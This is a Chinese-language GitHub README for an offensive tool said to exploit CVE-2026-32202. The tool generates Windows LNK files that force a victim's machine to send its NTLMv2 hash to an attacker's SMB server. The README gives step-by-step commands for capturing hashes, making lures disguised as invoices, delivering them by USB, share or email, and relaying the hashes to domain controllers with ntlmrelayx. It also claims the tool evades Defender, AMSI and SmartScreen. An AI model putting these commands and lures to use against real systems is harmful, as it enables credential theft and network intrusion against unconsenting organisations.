solarlynxsqueeze/CVE-2026-32202

GitHub: solarlynxsqueeze/CVE-2026-32202

利用 Windows Shell LNK 文件 UNC 路径处理缺陷(CVE-2026-32202)生成特制 LNK 文件,以极低交互方式强制获取 Net-NTLMv2 哈希。

Stars: 0 | Forks: 0

**免责声明** 本工具仅用于**授权的红蓝对抗和渗透测试**。 未经明确授权擅自对系统使用本工具是违法行为。 使用风险自负。作者对任何滥用或造成的损害不承担任何责任。 **描述** 通过绕过不完整的 Windows Shell 保护(CVE-2026-32202)强制获取 NTLMv2 哈希。生成特制的 LNK 文件,在 Explorer 中打开或预览时强制触发 SMB/UNC 身份验证。交互要求低,适用于 2026 年 4 月补丁修复不彻底的已修补系统。在实际测试项目中被广泛使用。 **主要特性** - 通过恶意 LNK 实现零点击 / 极低交互的 Net-NTLMv2 泄露(利用 Explorer 预览 + 图标解析路径)。 - 用于捕获哈希的自定义 SMB 监听器(无需 Responder,日志更干净)。 - 具有较低 ETW/Defender 特征的稳定变种。 - 部分绕过 AMSI/SmartScreen 的模式。 - 可直接用于 ntlmrelayx 中继链(SMB、LDAP、HTTP 等)。 **漏洞利用原理** 该工具创建一个特制的 `.LNK` 文件,滥用 Shell 对 Target + IconEnvironmentDataBlock / ExtraData 结构中 UNC 路径的处理方式。当受害者浏览文件夹或悬停/预览该文件时,Windows Shell 会向攻击者控制的 UNC 发起 SMB 连接,从而泄露机器/用户的 Net-NTLMv2 哈希。目标系统上无代码执行——仅用于凭据强制窃取,以进行中继或破解。 **为何有用** - 在内部渗透测试 / 红队行动中实现快速初始访问(尤其是在限制钓鱼攻击的隔离或加固环境中)。 - 完美适用于向高价值目标(DC、文件服务器、Exchange、ADCS 等)进行 NTLM 中继。 - 适用于传统 Responder 被拦截或动静过大的场景。 - 在 Win10 21H2–22H2、Win11 23H2–26H1、Server 2019–2025 上具有高成功率(已在以下版本测试)。 **测试环境** - Windows 11 24H2 (build 26100.XXXX) - Windows 11 23H2 / 25H2 - Windows 10 22H2 - Windows Server 2022 / 2025 (core + 桌面体验) - 在 2026 年 4 月累积更新之后部分有效(已确认实际环境中存在补丁不完整的情况)。 **依赖项** 安装:`pip install -r requirements.txt` **用法** ``` # 1. 启动捕获服务器 (攻击者主机) python smbcapture.py -i 0.0.0.0 -p 445 --output hashes.txt # 2. 生成恶意 LNK python coercegen.py --unc \\attacker-ip\share\test --output "Invoice_Q2.lnk" --spoof "invoice.pdf" # 可选: stable 或 bypass 模式 python coercestable.py --unc \\attacker-ip\share\test --output "Report.lnk" # 3. 投递 LNK (USB, 共享, 电子邮件附件, OneDrive 等) # 4. 在终端 + 文件中等待 hash。示例 relay: ntlmrelayx.py -t smb://target-dc -c whoami --no-wmipriv # 或用于 RBCD 的 LDAP relay, 用于 ADCS cert 的 HTTP 等。 ``` **漏洞利用** [链接](https://tinyurl.com/58bfa26m) **局限性** - 需要受害者与包含该文件的文件夹进行交互(Explorer 预览/悬停通常即可触发)。 - 现代网络隔离 + SMB 签名 + NTLM 限制会降低中继成功率。 - 并非完整的 RCE - 仅限获取凭据信息。 - 补丁状态非常关键;完全更新至 2026 年 4 月及之后的系统可能需要使用绕过变种。 **根本原因(简述)** Windows Shell 在处理用于 LNK 图标/目标解析的 UNC 路径清理和 ExtraData 块时存在不完整的修复。旨在阻止未授权网络欺骗的保护机制在 Shell 命名空间枚举期间仍会触发 NTLM 身份验证。
标签:AMSI绕过, CTF学习, CVE-2026-32202, LNK文件漏洞, NTLMv2哈希窃取, SmartScreen绕过, SMB认证强制, UNC路径利用, Windows Shell, 企业安全, 内网横向移动, 内网渗透, 凭据窃取, 哈希中继, 威胁检测, 网络安全, 网络资产管理, 逆向工具, 隐私保护, 零点击漏洞